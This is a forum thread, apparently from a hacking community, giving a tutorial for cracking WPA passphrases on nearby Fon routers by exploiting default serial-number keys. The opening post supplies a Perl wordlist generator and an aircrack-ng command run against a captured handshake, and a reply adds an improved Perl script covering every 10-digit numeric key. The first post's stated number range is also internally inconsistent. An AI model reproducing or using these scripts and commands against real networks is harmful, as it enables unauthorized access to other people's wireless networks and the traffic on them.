Results 1 to 10 of 16

Thread: How to Bruteforce a WPA Fon Wlan

Hybrid View

  1. #1

    Default How to Bruteforce a WPA Fon Wlan

    Hey Community,

    In this little Tutorial i'm gonna show you, hot to Bruteforce nearby Fon Routers

    So the interesting thing which I note, is that a Fon AP's default WPA passphrase is it's serial number, printed under the box. These serial numbers are sequential, thus making it very easy to guess their entire range.

    So for this i use a little Perl Script, which generates a file, included all Numbers from 807200000 till 8702555555
    $n = 8702000000;
    while ($n <= 8702555555) { system ("echo $n >> numbers.txt"); $n++; }
    So then we need a WPA Handshake to try out. I'm not gonna describe how you get one because there are million Posts about it.

    Then we Simply use Aircrack and start Bruteforcing

    aircrack-ng fon-01.cap -w /root/fon/numbers.txt

    So this is it Cracked.

    IF you have further questions feel free to a PM or visit my Blog.
    In German = My_0wn_Remote
    In English = my_english_remote

    I also created a littel Tutorial Video for this whole thing

    YouTube - How to Bruteforce a nearby WPA Fon Wlan [3]

    Maybee it is worth for the Video Section, i can't measure

    =) Reeth

  2. #2
    Senior Member orange's Avatar
    Join Date
    Jan 2010


    included all Numbers from 807200000 till 8702555555
    How do you come to that assumption? I have 7 Foneras (2100 model) and all my serial numbers are out of that particular range. JFYI, there already have been some efforts from FoneraHacks forums-member verticalfall to create precomputed WPA tables for the MyPlace SSID (covering several ranges of Fonera serial numbers) - unfortunately I cannot find the link currently though.

    Nice project!

  3. #3


    hey or4n9e
    yeah that could be possible, that it not fits in your country maybee they change the Serial Number in different Countries...but i don't think so...
    I also have 2 Fonera 2100 Routers but they all got S/N with 8072....Numbers...

  4. #4
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    The Crystal Wind


    Quote Originally Posted by Reeth View Post
    but they all got S/N with 8072....Numbers...
    Have a look through the various forums around the place, I can assure you that, like the man said, they do not all fall within the 8072 range.

    That said, the sheer size of the serial key not withstanding, you could just compute the numerics for all the possibilities at that width of serial numbers (10^10 or something - it's early and my math-fu is weak without coffee). It wouldn't even be hard to do, so let me try hack something up while I write this post (it will be untested ):
    open(DICT, ">outputfile.txt") || die "Bugger: $!";
    my $i = "0000000000";
    while($i < 10000000000) {
        my $j = sprintf("%010d", $i);
        print DICT "$j\n";
    The numbers are large, you are dealing with 10,000,000,000 possibilities which is a lot, a pyrit box might be able to generate them fast enough, but for my taste that is a bit of a stretch.

    That would work for any 10 numeric digit WPA key by the way, and removes the need for targeted mishaps like the original.

    Also it removes that terrible call to echo which would slow the generation down.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  5. #5
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010


    My fon S/N starts with 8704... Seems that the only number that repeats itself is the first "8"...

  6. #6
    Join Date
    Mar 2007


    I have a word list which contains all possible combinations of 10 digit hex and it is about 37 gigs, just FYI

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts